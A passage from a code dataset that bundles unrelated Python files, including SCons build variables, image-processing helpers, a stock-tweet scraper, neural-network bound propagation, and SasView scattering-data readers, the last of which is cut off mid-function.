18096
|
<reponame>Relintai/pandemonium_engine
# MIT License
#
# Copyright The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Variable type for package Variables.
To be used whenever a 'package' may be enabled/disabled and the
package path may be specified.
Given these options ::
x11=no (disables X11 support)
x11=yes (will search for the package installation dir)
x11=/usr/local/X11 (will check this path for existence)
Can be used as a replacement for autoconf's ``--with-xxx=yyy`` ::
opts = Variables()
opts.Add(
PackageVariable(
key='x11',
help='use X11 installed here (yes = search some places)',
default='yes'
)
)
...
if env['x11'] == True:
dir = ... # search X11 in some standard places ...
env['x11'] = dir
if env['x11']:
... # build with x11 ...
"""
from typing import Tuple, Callable
import SCons.Errors
__all__ = ['PackageVariable',]
ENABLE_STRINGS = ('1', 'yes', 'true', 'on', 'enable', 'search')
DISABLE_STRINGS = ('0', 'no', 'false', 'off', 'disable')
def _converter(val):
""" """
lval = val.lower()
if lval in ENABLE_STRINGS:
return True
if lval in DISABLE_STRINGS:
return False
return val
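# Illustrative mapping of the converter (sketch, not exhaustive):
#   _converter('yes')            -> True
#   _converter('off')            -> False
#   _converter('/usr/local/X11') -> '/usr/local/X11'  (kept as a path string)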
def _validator(key, val, env, searchfunc) -> None:
""" """
# NB: searchfunc is currently undocumented and unsupported
# TODO write validator, check for path
import os
if env[key] is True:
if searchfunc:
env[key] = searchfunc(key, val)
elif env[key] and not os.path.exists(val):
raise SCons.Errors.UserError(
'Path does not exist for option %s: %s' % (key, val))
def PackageVariable(key, help, default, searchfunc=None) -> Tuple[str, str, str, Callable, Callable]:
"""Return a tuple describing a package list SCons Variable.
The input parameters describe a 'package list' option. Returns
a tuple including the correct converter and validator appended.
The result is usable as input to :meth:`Add` .
A 'package list' option may either be 'all', 'none' or a pathname
string. This information is appended to *help*.
"""
# NB: searchfunc is currently undocumented and unsupported
help = '\n '.join(
(help, '( yes | no | /path/to/%s )' % key))
return (key, help, default,
lambda k, v, e: _validator(k, v, e, searchfunc),
_converter)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
StarcoderdataPython
|
117333
|
<gh_stars>10-100
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
"""
import numpy as np
from skimage import draw
from scipy.ndimage import label, morphology
import copy
import time
import skimage as sk
import matplotlib as mpl
import plotting
mpl.rcParams['figure.dpi'] = 300
def pixellines_to_ordered_points(matrix, half_tile):
# break guidelines into chains and order the pixel for all chain
# import cv2
# chains3 = []
matrix = sk.morphology.skeletonize(matrix) # nicer lines, better results
matrix_labeled, chain_count = label(matrix, structure=[[1,1,1], [1,1,1], [1,1,1]]) # find chains
chains = []
    for i_chain in range(1, chain_count + 1):  # labels from scipy.ndimage.label run 1..chain_count
pixel = copy.deepcopy(matrix_labeled)
pixel[pixel!=i_chain] = 0
# alternative using openCV results results in closed chains (might be better), but a few chains are missing
# hierarchy,contours = cv2.findContours(pixel.astype(np.uint8), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)
# for h in hierarchy:
# h2 = h.reshape((-1,2))
# h3 = [list(xy)[::-1] for xy in h2]
# if len(h3)>3:
# chains3 += [ h3 ]
while True:
points = np.argwhere(pixel!=0)
if len(points)==0: break
x,y = points[0] # set starting point
done = False
subchain = []
while not done:
subchain += [[x,y]]
pixel[x,y] = 0
done = True
for dx,dy in [(+1,0),(-1,0),(+1,-1),(-1,+1),(0,-1,),(0,+1),(-1,-1),(+1,+1)]:
                    if x+dx>=0 and x+dx<pixel.shape[0] and y+dy>=0 and y+dy<pixel.shape[1]: # check that the neighbour is inside the image
if pixel[x+dx,y+dy]>0: # check for pixel here
x,y = x+dx, y+dy # if yes, jump here
done = False # tell the middle loop that the chain is not finished
break # break inner loop
if len(subchain)>half_tile//2:
chains += [subchain]
return chains
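# Illustrative sketch (synthetic input, not part of the original module): a small
# image with a single straight guideline should produce one ordered chain.
#
#   demo = np.zeros((20, 20), dtype=np.uint8)
#   demo[10, 2:18] = 1
#   chains = pixellines_to_ordered_points(demo, half_tile=4)
#   print(len(chains), len(chains[0]))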
def chains_and_angles(img_edges, half_tile, plot=[]):
# for each pixel get distance to closest edge
distances = morphology.distance_transform_edt(img_edges==0,)
# tiles will be placed centered along guidelines (closed lines)
""" tile
xxxxxx
xxxxxx
---------------------- guideline
xxxxxx
xxxxxx
"""
w,h = img_edges.shape[0],img_edges.shape[1]
guidelines = np.zeros((w, h), dtype=np.uint8)
mask = ( (distances.astype(int)+half_tile) % (2*half_tile)==0)
guidelines[mask] = 1
# break into chains and order the points
t0 = time.time()
chains = pixellines_to_ordered_points(guidelines, half_tile)
print ('Pixel guidelines to chains with sorted points:', f'{time.time()-t0:.1f}s')
# use distances to calculate gradients => rotation of tiles when placed later
t0 = time.time()
gradient = np.zeros((w,h))
for x in range(1,w-1):
for y in range(1,h-1):
numerator = distances[x,y+1]-distances[x,y-1]
denominator = distances[x+1,y]-distances[x-1,y]
gradient[x,y] = np.arctan2(numerator, denominator)
angles_0to180 = (gradient*180/np.pi+180) % 180
print ('Calculation of angle matrix:', f'{time.time()-t0:.1f}s')
# Remark: it would be enough to calculate only x,y inside the chain => faster
# interim_stages = dict(distances=distances, guidelines=guidelines, chains=chains,
# gradient=gradient, angles_0to180=angles_0to180)
if 'distances' in plot: plotting.plot_image(distances, title='distances')
if 'guidelines' in plot: plotting.plot_image(guidelines, inverted=True, title='guidelines')
if 'gradient' in plot: plotting.plot_image(gradient, title='gradients')
if 'angles_0to180' in plot: plotting.plot_image(angles_0to180)
return chains, angles_0to180#, interim_stages
def chains_into_gaps(polygons, h, w, half_tile, CHAIN_SPACING, plot=[]):
# get area which are already occupied
img_chains = np.zeros((h, w), dtype=np.uint8)
for p in polygons:
y,x = p.exterior.coords.xy
rr, cc = draw.polygon(x, y, shape=img_chains.shape)
img_chains[rr, cc] = 1
distance_to_tile = morphology.distance_transform_edt(img_chains==0)
d = distance_to_tile.astype(int)
# define new guidelines
chain_spacing = int(round(half_tile*CHAIN_SPACING))
if chain_spacing <= 1: # would select EVERY pixel inside gap
chain_spacing = 2
# first condition (d==1) => chains around all (even the smallest) gap borders
# (set e.g. d==2 for faster calculations)
# second condition (...) => more chains inside larger gaps
mask = (d==1) | ( (d%chain_spacing==0) & (d>0) )
guidelines2 = np.zeros((h, w), dtype=np.uint8)
guidelines2[mask] = 1
chains2 = pixellines_to_ordered_points(guidelines2, half_tile)
if 'used_up_space' in plot: plotting.plot_image(img_chains, title='gaps')
if 'distance_to_tile' in plot: plotting.plot_image(distance_to_tile, inverted=True)
if 'filler_guidelines' in plot: plotting.plot_image(guidelines2, inverted=True, title='new guidelines')
return chains2
if __name__ == '__main__':
img = sk.data.coffee()
import edges
img_edges = edges.edges_diblasi(img)
img_edges = edges.edges_hed(img, gauss=0)
chains, angles_0to180 = chains_and_angles(img_edges, half_tile=10)
|
StarcoderdataPython
|
3403438
|
import numpy as np
def load_spectrum(spectrum_path, lambda_min=100, lambda_max=1000,
delimiter=','):
"""
Load a spectrum file.
Parameters
----------
spectrum_path : string
File path.
lambda_min : scalar, optional
Cut the data at this minimum wavelength in nm.
lambda_max : scalar, optional
Cut the data at this maximum wavelength in nm.
delimiter : string, optional
Delimiter between columns in the datafile.
Returns
-------
values : arrays
(lamdbas, intensities)
"""
data = np.loadtxt(spectrum_path, delimiter=delimiter)
lambdas, intensities = np.column_stack(data)
mask = (lambdas > lambda_min) & (lambdas < lambda_max)
return lambdas[mask], intensities[mask]
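# Example usage (illustrative; 'spectrum.csv' is a hypothetical two-column file
# of wavelength [nm] and intensity):
#
#   lambdas, intensities = load_spectrum('spectrum.csv', lambda_min=400, lambda_max=800)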
|
StarcoderdataPython
|
1651284
|
# coding=utf-8
# Copyright 2019 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fast-Lin bound calculation for common neural network layers.
The Fast-Lin algorithm expresses lower and upper bounds of each layer of
a neural network as a symbolic linear expression in the input neurons,
relaxing the ReLU layers to retain linearity at the expense of tightness.
Reference: "Towards Fast Computation of Certified Robustness for ReLU Networks",
https://arxiv.org/pdf/1804.09699.pdf.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from deep_verify.src.bounds import layer_bounds
import interval_bound_propagation as ibp
class FastlinBoundPropagation(layer_bounds.BoundPropagation):
"""Method for propagating symbolic bounds in multiple passes."""
def __init__(self, num_rounds=1, best_with_naive=False):
super(FastlinBoundPropagation, self).__init__()
self._num_rounds = num_rounds
self._best_with_naive = best_with_naive
def propagate_bounds(self, network, in_bounds):
if self._best_with_naive:
# Initial round of interval bound propagation.
super(FastlinBoundPropagation, self).propagate_bounds(network, in_bounds)
for _ in range(self._num_rounds):
# Construct symbolic bounds and propagate them.
super(FastlinBoundPropagation, self).propagate_bounds(
network, ibp.RelativeSymbolicBounds.convert(in_bounds))
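# Illustrative usage sketch (not part of the original module): `network` and
# `in_bounds` are assumed to come from the surrounding deep_verify /
# interval_bound_propagation pipeline.
#
#   propagation = FastlinBoundPropagation(num_rounds=2, best_with_naive=True)
#   propagation.propagate_bounds(network, in_bounds)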
|
StarcoderdataPython
|
5103468
|
import re
import pandas as pd
import snscrape.modules.twitter as sntwitter
maxTweets = 1000
tweets = []
keywords = ['TSLA', 'NVDA']
start = '2022-02-01'
end = '2022-02-02'
def clean_text(text):
text = re.sub("@[A-Za-z0-9]+", '', text)
text = re.sub("#[A-Za-z0-9_]+", '', text)
text = re.sub("https?://S+", '', text)
text = re.sub(r"http\S+", '', text)
text = re.sub(r"www.\S+", '', text)
text = re.sub(r'[.*?]', '', text)
text = re.sub('[()!?]', '', text)
text = re.sub("\\d+\\w*\\d*", '', text)
text = re.sub("[^\x01-\x7F]", '', text) # remove emotions
return text
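# Illustrative example (the sample text is made up): mentions, hashtags, URLs,
# digits and non-ASCII symbols are stripped before the tweet is stored.
#
#   cleaned = clean_text("@trader $TSLA up 5% today https://t.co/abc #bullish")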
for keyword in keywords:
query = f'${keyword} since:{start} until:{end} lang:en'
for i, tweet in enumerate(sntwitter.TwitterSearchScraper(query).get_items()):
if i > maxTweets:
break
totalMentions = 0
if tweet.mentionedUsers is not None:
totalMentions = len(tweet.mentionedUsers)
content = [keyword, clean_text(tweet.content),
tweet.replyCount, tweet.retweetCount, tweet.likeCount, tweet.quoteCount,
totalMentions]
tweets.append(content)
# Creating a dataframe from the tweets list above
columns = ['Ticker', 'Text', 'replyCount', 'retweetCount', 'likeCount', 'quoteCount', 'mentionedUsers']
tweets_df2 = pd.DataFrame(tweets, columns=columns)
tweets_df3 = tweets_df2.drop_duplicates(subset='Text', keep="last")
tweets_df3.to_csv('data/stock_tweets_simple.csv', sep=',', index=False)
|
StarcoderdataPython
|
6614353
|
<filename>backend/sensors/Sensor.py<gh_stars>1-10
from Bluetin_Echo import Echo
class Sensor:
def __init__(self, trigger_pin, echo_pin, angle):
self._trigger_pin = trigger_pin
self._echo_pin = echo_pin
self._angle = angle
self._sr04 = Echo(self._trigger_pin, self._echo_pin)
def getDistance(self, samples = 1):
return self._sr04.read('cm', samples)
def getAngle(self):
return self._angle
def getTriggerPin(self):
return self._trigger_pin
def getEchoPin(self):
return self._echo_pin
def stop(self):
self._sr04.stop()
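if __name__ == '__main__':
    # Minimal demo sketch: the GPIO pin numbers below are placeholders and assume
    # an HC-SR04 ultrasonic sensor wired to those pins on a Raspberry Pi.
    sensor = Sensor(trigger_pin=17, echo_pin=27, angle=90)
    print(sensor.getDistance(samples=3), 'cm at', sensor.getAngle(), 'degrees')
    sensor.stop()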
|
StarcoderdataPython
|
3497058
|
from datetime import datetime
from functools import reduce
from typing import List
DESIRED_QUOTE_KEYS = [
"bid_price",
"ask_price",
"bid_size",
"ask_size",
"updated_at",
"last_trade_price",
"last_extended_hours_trade_price",
]
def pluck(keys: List[str], dictionary: dict) -> dict:
def pluck_inner(acc: dict, pair) -> dict:
(key, value) = pair
return {**acc, key: value} if key in keys else acc
return reduce(pluck_inner, dictionary.items(), {})
UPDATED_AT_TIME_FORMAT_STRING = "%Y-%m-%dT%H:%M:%SZ"
def parse_updated_at(updated_at: str) -> datetime:
return datetime.strptime(updated_at, UPDATED_AT_TIME_FORMAT_STRING)
INSTRUMENT_ID_RGX = r"https://api.robinhood.com/instruments/(.+?)/"
def parse_instrument_url(instrument_url: str) -> str:
return instrument_url.split("instruments/")[1][:-1]
def build_instrument_url(instrument_id: str) -> str:
return f"https://api.robinhood.com/instruments/{instrument_id}/"
def omit(k, d: dict) -> dict:
new_d = {**d}
new_d.__delitem__(k)
return new_d
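if __name__ == "__main__":
    # Illustrative sanity checks for the helpers above (values are made up).
    quote = {"bid_price": "1.00", "ask_price": "1.02", "foo": "bar"}
    assert pluck(["bid_price", "ask_price"], quote) == {"bid_price": "1.00", "ask_price": "1.02"}
    assert parse_instrument_url("https://api.robinhood.com/instruments/abc123/") == "abc123"
    assert build_instrument_url("abc123") == "https://api.robinhood.com/instruments/abc123/"
    assert omit("foo", quote) == {"bid_price": "1.00", "ask_price": "1.02"}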
|
StarcoderdataPython
|
8023591
|
<reponame>teodoramilcheva/softuni-software-engineering
from project.motorcycle import Motorcycle
class CrossMotorcycle(Motorcycle):
pass
|
StarcoderdataPython
|
11366268
|
<filename>hackerearth/events/june_circuits/set-2/little_boruto_and_rail_ways/solution-2.py
def main():
n, m = map(int, raw_input().split())
roads = map(lambda _ : map(int, raw_input().split()), range(0, m))
v = [0] * n
for i, j in roads:
if i != j:
v[i - 1] = 1
v[j - 1] = 1
design_score = reduce(lambda x, y : x + y, v)
print design_score
if __name__ == '__main__':
main()
# notes:
# very simple approach
# make a single pass through the road list and detect all nodes that have edges (roads) from it
# those nodes (stations) will have a path going another node and coming back (hence, length of at least 2)
# count those nodes
#
# score: 24 (failures: errors)
|
StarcoderdataPython
|
4830241
|
<reponame>limeonion/Python-Programming
'''
url= https://www.hackerrank.com/challenges/python-tuples/problem?h_r=next-challenge&h_v=zen
'''
n = int(input())
integer_list = map(int, input().split())
print(hash(tuple(integer_list)))
|
StarcoderdataPython
|
9684657
|
# pylint: disable=invalid-name
"""
SAS generic computation and sld file readers
"""
from __future__ import print_function
import os
import sys
import copy
import logging
from periodictable import formula
from periodictable import nsf
import numpy as np
from . import _sld2i
from .BaseComponent import BaseComponent
logger = logging.getLogger(__name__)
if sys.version_info[0] < 3:
def decode(s):
return s
else:
def decode(s):
return s.decode() if isinstance(s, bytes) else s
MFACTOR_AM = 2.853E-12
MFACTOR_MT = 2.3164E-9
METER2ANG = 1.0E+10
#Avogadro constant [1/mol]
NA = 6.02214129e+23
def mag2sld(mag, v_unit=None):
"""
Convert magnetization to magnatic SLD
sldm = Dm * mag where Dm = gamma * classical elec. radius/(2*Bohr magneton)
    Dm ~ 2.853E-12 [A^(-2)] (note: some references give 2.90636E-12 [A^(-2)] instead)
"""
if v_unit == "A/m":
factor = MFACTOR_AM
elif v_unit == "mT":
factor = MFACTOR_MT
else:
raise ValueError("Invalid valueunit")
sld_m = factor * mag
return sld_m
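# Example (illustrative): a magnetization of 1 A/m corresponds to a magnetic SLD
# of MFACTOR_AM, i.e. mag2sld(1.0, v_unit="A/m") == 2.853e-12 [A^(-2)].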
def transform_center(pos_x, pos_y, pos_z):
"""
re-center
:return: posx, posy, posz [arrays]
"""
posx = pos_x - (min(pos_x) + max(pos_x)) / 2.0
posy = pos_y - (min(pos_y) + max(pos_y)) / 2.0
posz = pos_z - (min(pos_z) + max(pos_z)) / 2.0
return posx, posy, posz
class GenSAS(BaseComponent):
"""
Generic SAS computation Model based on sld (n & m) arrays
"""
def __init__(self):
"""
Init
:Params sld_data: MagSLD object
"""
# Initialize BaseComponent
BaseComponent.__init__(self)
self.sld_data = None
self.data_pos_unit = None
self.data_x = None
self.data_y = None
self.data_z = None
self.data_sldn = None
self.data_mx = None
self.data_my = None
self.data_mz = None
self.data_vol = None #[A^3]
self.is_avg = False
## Name of the model
self.name = "GenSAS"
## Define parameters
self.params = {}
self.params['scale'] = 1.0
self.params['background'] = 0.0
self.params['solvent_SLD'] = 0.0
self.params['total_volume'] = 1.0
self.params['Up_frac_in'] = 1.0
self.params['Up_frac_out'] = 1.0
self.params['Up_theta'] = 0.0
self.description = 'GenSAS'
## Parameter details [units, min, max]
self.details = {}
self.details['scale'] = ['', 0.0, np.inf]
self.details['background'] = ['[1/cm]', 0.0, np.inf]
self.details['solvent_SLD'] = ['1/A^(2)', -np.inf, np.inf]
self.details['total_volume'] = ['A^(3)', 0.0, np.inf]
self.details['Up_frac_in'] = ['[u/(u+d)]', 0.0, 1.0]
self.details['Up_frac_out'] = ['[u/(u+d)]', 0.0, 1.0]
self.details['Up_theta'] = ['[deg]', -np.inf, np.inf]
# fixed parameters
self.fixed = []
def set_pixel_volumes(self, volume):
"""
Set the volume of a pixel in (A^3) unit
:Param volume: pixel volume [float]
"""
if self.data_vol is None:
raise TypeError("data_vol is missing")
self.data_vol = volume
def set_is_avg(self, is_avg=False):
"""
Sets is_avg: [bool]
"""
self.is_avg = is_avg
def _gen(self, qx, qy):
"""
Evaluate the function
        :Param qx: array of qx values
        :Param qy: array of qy values (empty list for a 1D calculation)
:return: function value
"""
pos_x = self.data_x
pos_y = self.data_y
pos_z = self.data_z
if self.is_avg is None:
pos_x, pos_y, pos_z = transform_center(pos_x, pos_y, pos_z)
sldn = copy.deepcopy(self.data_sldn)
sldn -= self.params['solvent_SLD']
# **** WARNING **** new_GenI holds pointers to numpy vectors
# be sure that they are contiguous double precision arrays and make
# sure the GC doesn't eat them before genicom is called.
# TODO: rewrite so that the parameters are passed directly to genicom
args = (
(1 if self.is_avg else 0),
pos_x, pos_y, pos_z,
sldn, self.data_mx, self.data_my,
self.data_mz, self.data_vol,
self.params['Up_frac_in'],
self.params['Up_frac_out'],
self.params['Up_theta'])
model = _sld2i.new_GenI(*args)
if len(qy):
qx, qy = _vec(qx), _vec(qy)
I_out = np.empty_like(qx)
#print("npoints", qx.shape, "npixels", pos_x.shape)
_sld2i.genicomXY(model, qx, qy, I_out)
#print("I_out after", I_out)
else:
qx = _vec(qx)
I_out = np.empty_like(qx)
_sld2i.genicom(model, qx, I_out)
vol_correction = self.data_total_volume / self.params['total_volume']
result = (self.params['scale'] * vol_correction * I_out
+ self.params['background'])
return result
def set_sld_data(self, sld_data=None):
"""
Sets sld_data
"""
self.sld_data = sld_data
self.data_pos_unit = sld_data.pos_unit
self.data_x = _vec(sld_data.pos_x)
self.data_y = _vec(sld_data.pos_y)
self.data_z = _vec(sld_data.pos_z)
self.data_sldn = _vec(sld_data.sld_n)
self.data_mx = _vec(sld_data.sld_mx)
self.data_my = _vec(sld_data.sld_my)
self.data_mz = _vec(sld_data.sld_mz)
self.data_vol = _vec(sld_data.vol_pix)
self.data_total_volume = sum(sld_data.vol_pix)
self.params['total_volume'] = sum(sld_data.vol_pix)
def getProfile(self):
"""
Get SLD profile
: return: sld_data
"""
return self.sld_data
def run(self, x=0.0):
"""
Evaluate the model
:param x: simple value
:return: (I value)
"""
if isinstance(x, list):
if len(x[1]) > 0:
msg = "Not a 1D."
raise ValueError(msg)
# 1D I is found at y =0 in the 2D pattern
out = self._gen(x[0], [])
return out
else:
msg = "Q must be given as list of qx's and qy's"
raise ValueError(msg)
def runXY(self, x=0.0):
"""
Evaluate the model
:param x: simple value
:return: I value
:Use this runXY() for the computation
"""
if isinstance(x, list):
return self._gen(x[0], x[1])
else:
msg = "Q must be given as list of qx's and qy's"
raise ValueError(msg)
def evalDistribution(self, qdist):
"""
Evaluate a distribution of q-values.
:param qdist: ndarray of scalar q-values (for 1D) or list [qx,qy]
where qx,qy are 1D ndarrays (for 2D).
"""
if isinstance(qdist, list):
return self.run(qdist) if len(qdist[1]) < 1 else self.runXY(qdist)
else:
mesg = "evalDistribution is expecting an ndarray of "
mesg += "a list [qx,qy] where qx,qy are arrays."
raise RuntimeError(mesg)
def _vec(v):
return np.ascontiguousarray(v, 'd')
class OMF2SLD(object):
"""
Convert OMFData to MAgData
"""
def __init__(self):
"""
Init
"""
self.pos_x = None
self.pos_y = None
self.pos_z = None
self.mx = None
self.my = None
self.mz = None
self.sld_n = None
self.vol_pix = None
self.output = None
self.omfdata = None
def set_data(self, omfdata, shape='rectangular'):
"""
Set all data
"""
self.omfdata = omfdata
length = int(omfdata.xnodes * omfdata.ynodes * omfdata.znodes)
pos_x = np.arange(omfdata.xmin,
omfdata.xnodes*omfdata.xstepsize + omfdata.xmin,
omfdata.xstepsize)
pos_y = np.arange(omfdata.ymin,
omfdata.ynodes*omfdata.ystepsize + omfdata.ymin,
omfdata.ystepsize)
pos_z = np.arange(omfdata.zmin,
omfdata.znodes*omfdata.zstepsize + omfdata.zmin,
omfdata.zstepsize)
self.pos_x = np.tile(pos_x, int(omfdata.ynodes * omfdata.znodes))
self.pos_y = pos_y.repeat(int(omfdata.xnodes))
self.pos_y = np.tile(self.pos_y, int(omfdata.znodes))
self.pos_z = pos_z.repeat(int(omfdata.xnodes * omfdata.ynodes))
self.mx = omfdata.mx
self.my = omfdata.my
self.mz = omfdata.mz
self.sld_n = np.zeros(length)
if omfdata.mx is None:
self.mx = np.zeros(length)
if omfdata.my is None:
self.my = np.zeros(length)
if omfdata.mz is None:
self.mz = np.zeros(length)
self._check_data_length(length)
self.remove_null_points(False, False)
mask = np.ones(len(self.sld_n), dtype=bool)
if shape.lower() == 'ellipsoid':
try:
# Pixel (step) size included
x_c = max(self.pos_x) + min(self.pos_x)
y_c = max(self.pos_y) + min(self.pos_y)
z_c = max(self.pos_z) + min(self.pos_z)
x_d = max(self.pos_x) - min(self.pos_x)
y_d = max(self.pos_y) - min(self.pos_y)
z_d = max(self.pos_z) - min(self.pos_z)
x_r = (x_d + omfdata.xstepsize) / 2.0
y_r = (y_d + omfdata.ystepsize) / 2.0
z_r = (z_d + omfdata.zstepsize) / 2.0
x_dir2 = ((self.pos_x - x_c / 2.0) / x_r)
x_dir2 *= x_dir2
y_dir2 = ((self.pos_y - y_c / 2.0) / y_r)
y_dir2 *= y_dir2
z_dir2 = ((self.pos_z - z_c / 2.0) / z_r)
z_dir2 *= z_dir2
mask = (x_dir2 + y_dir2 + z_dir2) <= 1.0
except Exception as exc:
logger.error(exc)
self.output = MagSLD(self.pos_x[mask], self.pos_y[mask],
self.pos_z[mask], self.sld_n[mask],
self.mx[mask], self.my[mask], self.mz[mask])
self.output.set_pix_type('pixel')
self.output.set_pixel_symbols('pixel')
def get_omfdata(self):
"""
Return all data
"""
return self.omfdata
def get_output(self):
"""
Return output
"""
return self.output
def _check_data_length(self, length):
"""
Check if the data lengths are consistent
:Params length: data length
"""
parts = (self.pos_x, self.pos_y, self.pos_z, self.mx, self.my, self.mz)
if any(len(v) != length for v in parts):
raise ValueError("Error: Inconsistent data length.")
def remove_null_points(self, remove=False, recenter=False):
"""
Removes any mx, my, and mz = 0 points
"""
if remove:
is_nonzero = (np.fabs(self.mx) + np.fabs(self.my) +
np.fabs(self.mz)).nonzero()
if len(is_nonzero[0]) > 0:
self.pos_x = self.pos_x[is_nonzero]
self.pos_y = self.pos_y[is_nonzero]
self.pos_z = self.pos_z[is_nonzero]
self.sld_n = self.sld_n[is_nonzero]
self.mx = self.mx[is_nonzero]
self.my = self.my[is_nonzero]
self.mz = self.mz[is_nonzero]
if recenter:
self.pos_x -= (min(self.pos_x) + max(self.pos_x)) / 2.0
self.pos_y -= (min(self.pos_y) + max(self.pos_y)) / 2.0
self.pos_z -= (min(self.pos_z) + max(self.pos_z)) / 2.0
def get_magsld(self):
"""
return MagSLD
"""
return self.output
class OMFReader(object):
"""
Class to load omf/ascii files (3 columns w/header).
"""
## File type
type_name = "OMF ASCII"
## Wildcards
type = ["OMF files (*.OMF, *.omf)|*.omf"]
## List of allowed extensions
ext = ['.omf', '.OMF']
def read(self, path):
"""
Load data file
:param path: file path
:return: x, y, z, sld_n, sld_mx, sld_my, sld_mz
"""
desc = ""
mx = np.zeros(0)
my = np.zeros(0)
mz = np.zeros(0)
try:
input_f = open(path, 'rb')
buff = decode(input_f.read())
lines = buff.split('\n')
input_f.close()
output = OMFData()
valueunit = None
for line in lines:
line = line.strip()
# Read data
if line and not line.startswith('#'):
try:
toks = line.split()
_mx = float(toks[0])
_my = float(toks[1])
_mz = float(toks[2])
_mx = mag2sld(_mx, valueunit)
_my = mag2sld(_my, valueunit)
_mz = mag2sld(_mz, valueunit)
mx = np.append(mx, _mx)
my = np.append(my, _my)
mz = np.append(mz, _mz)
except Exception as exc:
# Skip non-data lines
logger.error(str(exc)+" when processing %r"%line)
#Reading Header; Segment count ignored
s_line = line.split(":", 1)
if s_line[0].lower().count("oommf") > 0:
oommf = s_line[1].lstrip()
if s_line[0].lower().count("title") > 0:
title = s_line[1].lstrip()
if s_line[0].lower().count("desc") > 0:
desc += s_line[1].lstrip()
desc += '\n'
if s_line[0].lower().count("meshtype") > 0:
meshtype = s_line[1].lstrip()
if s_line[0].lower().count("meshunit") > 0:
meshunit = s_line[1].lstrip()
if meshunit.count("m") < 1:
msg = "Error: \n"
msg += "We accept only m as meshunit"
raise ValueError(msg)
if s_line[0].lower().count("xbase") > 0:
xbase = s_line[1].lstrip()
if s_line[0].lower().count("ybase") > 0:
ybase = s_line[1].lstrip()
if s_line[0].lower().count("zbase") > 0:
zbase = s_line[1].lstrip()
if s_line[0].lower().count("xstepsize") > 0:
xstepsize = s_line[1].lstrip()
if s_line[0].lower().count("ystepsize") > 0:
ystepsize = s_line[1].lstrip()
if s_line[0].lower().count("zstepsize") > 0:
zstepsize = s_line[1].lstrip()
if s_line[0].lower().count("xnodes") > 0:
xnodes = s_line[1].lstrip()
if s_line[0].lower().count("ynodes") > 0:
ynodes = s_line[1].lstrip()
if s_line[0].lower().count("znodes") > 0:
znodes = s_line[1].lstrip()
if s_line[0].lower().count("xmin") > 0:
xmin = s_line[1].lstrip()
if s_line[0].lower().count("ymin") > 0:
ymin = s_line[1].lstrip()
if s_line[0].lower().count("zmin") > 0:
zmin = s_line[1].lstrip()
if s_line[0].lower().count("xmax") > 0:
xmax = s_line[1].lstrip()
if s_line[0].lower().count("ymax") > 0:
ymax = s_line[1].lstrip()
if s_line[0].lower().count("zmax") > 0:
zmax = s_line[1].lstrip()
if s_line[0].lower().count("valueunit") > 0:
valueunit = s_line[1].lstrip().rstrip()
if s_line[0].lower().count("valuemultiplier") > 0:
valuemultiplier = s_line[1].lstrip()
if s_line[0].lower().count("valuerangeminmag") > 0:
valuerangeminmag = s_line[1].lstrip()
if s_line[0].lower().count("valuerangemaxmag") > 0:
valuerangemaxmag = s_line[1].lstrip()
if s_line[0].lower().count("end") > 0:
output.filename = os.path.basename(path)
output.oommf = oommf
output.title = title
output.desc = desc
output.meshtype = meshtype
output.xbase = float(xbase) * METER2ANG
output.ybase = float(ybase) * METER2ANG
output.zbase = float(zbase) * METER2ANG
output.xstepsize = float(xstepsize) * METER2ANG
output.ystepsize = float(ystepsize) * METER2ANG
output.zstepsize = float(zstepsize) * METER2ANG
output.xnodes = float(xnodes)
output.ynodes = float(ynodes)
output.znodes = float(znodes)
output.xmin = float(xmin) * METER2ANG
output.ymin = float(ymin) * METER2ANG
output.zmin = float(zmin) * METER2ANG
output.xmax = float(xmax) * METER2ANG
output.ymax = float(ymax) * METER2ANG
output.zmax = float(zmax) * METER2ANG
output.valuemultiplier = valuemultiplier
output.valuerangeminmag = mag2sld(float(valuerangeminmag), \
valueunit)
output.valuerangemaxmag = mag2sld(float(valuerangemaxmag), \
valueunit)
output.set_m(mx, my, mz)
return output
except Exception:
msg = "%s is not supported: \n" % path
msg += "We accept only Text format OMF file."
raise RuntimeError(msg)
class PDBReader(object):
"""
PDB reader class: limited for reading the lines starting with 'ATOM'
"""
type_name = "PDB"
## Wildcards
type = ["pdb files (*.PDB, *.pdb)|*.pdb"]
## List of allowed extensions
ext = ['.pdb', '.PDB']
def read(self, path):
"""
Load data file
:param path: file path
:return: MagSLD
:raise RuntimeError: when the file can't be opened
"""
pos_x = np.zeros(0)
pos_y = np.zeros(0)
pos_z = np.zeros(0)
sld_n = np.zeros(0)
sld_mx = np.zeros(0)
sld_my = np.zeros(0)
sld_mz = np.zeros(0)
vol_pix = np.zeros(0)
pix_symbol = np.zeros(0)
x_line = []
y_line = []
z_line = []
x_lines = []
y_lines = []
z_lines = []
try:
input_f = open(path, 'rb')
buff = decode(input_f.read())
lines = buff.split('\n')
input_f.close()
num = 0
for line in lines:
try:
